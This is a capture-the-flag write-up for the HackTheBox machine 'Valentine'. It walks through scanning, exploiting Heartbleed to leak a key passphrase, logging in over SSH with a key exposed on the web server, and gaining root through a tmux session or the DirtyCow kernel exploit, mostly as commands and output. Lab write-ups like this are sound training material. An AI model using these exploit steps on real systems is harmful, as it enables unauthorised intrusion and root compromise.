Explore the fundamentals of cybersecurity in the Valentine Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.79 valentine.htb

Script to add hosts automatically

ip="10.10.10.79"
domain="valentine.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV valentine.htb -Pn

Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2024-10-06T15:19:57+00:00; 0s from scanner time.
Service Info: Host: 10.10.10.136; OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2014-0160 (Heartbleed Vulnerability)

Validate Vulnerability:

nmap --script=ssl-heartbleed -p 443 valentine.htb -Pn

Download the Proof of Concept (PoC):

git clone https://github.com/sensepost/heartbleed-poc.git
cd heartbleed-poc

Use the PoC and Extract the Password from the Dump:

python2 heartbleed-poc.py -n1 -f dump.bin valentine.htb -p 443
strings dump.bin | tail -n 1 | sed 's/\$text=//' | base64 -d

Note: This command might need to be run multiple times to capture the necessary data.

Enumeration

Perform Directory Bruteforcing:

dirb http://valentine.htb

Results:

+ http://10.10.10.79/cgi-bin/ (CODE:403 | SIZE:287)
+ http://10.10.10.79/decode (CODE:200 | SIZE:552)
+ http://10.10.10.79/dev/    (DIRECTORY)
+ http://10.10.10.79/encode (CODE:200 | SIZE:554)
+ http://10.10.10.79/index (CODE:200 | SIZE:38)
+ http://10.10.10.79/index.php (CODE:200 | SIZE:38)
+ http://10.10.10.79/server-status (CODE:403 | SIZE:292)

Investigate the /dev/ Directory:

Going to http://valentine.htb/dev/, you find two files:

  1. notes.txt
  2. hype_key

Contents of notes.txt:

To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Download the Encrypted Key from hype_key and ssh in the machine:

curl -sk http://10.10.10.79/dev/hype_key > hype_key
cat hype_key | xxd -r -p > hype_key_encrypted
openssl rsa -in hype_key_encrypted -out hype.key
chmod 600 hype.key
rm -rf hype_key hype_key_encrypted
ssh -i hype.key hype@valentine.htb -o PubkeyAcceptedKeyTypes=+ssh-rsa

Privilege Escalation

Find the user.txt Flag:

find . -name user.txt -exec wc -c {} \; -exec cat {} \;

Check for Processes Running as Root (e.g., tmux):

ps -ef | grep tmux

You find a running tmux session.

Retrieve Commands from History:

history

From the history, the following command is revealed:

tmux -S /.devs/dev_sess

This gives access to a tmux session where you can now obtain the root.txt flag:

cat /root/root.txt

Alternative Privilege Escalation (DirtyCow)

We suspect the system is running an old kernel vulnerable to DirtyCow (CVE-2016-5195). To confirm, we check the kernel version:

uname -a

Output:

Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 GNU/Linux

The version is vulnerable. Next, we use searchsploit to find available DirtyCow exploits:

searchsploit dirty

From the results, we select an exploit that modifies /etc/passwd to add a new root user. We download the exploit:

searchsploit -m exploits/linux/local/40839.c

Upload the exploit to the target:

scp -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype.key 40839.c hype@valentine.htb:/home/hype/

Run the exploit:

gcc -pthread 40839.c -o dirtycow -lcrypt
chmod +x dirtycow
./dirtycow

switch to the created user

su firefart

You now have root access via the new user created by the DirtyCow exploit.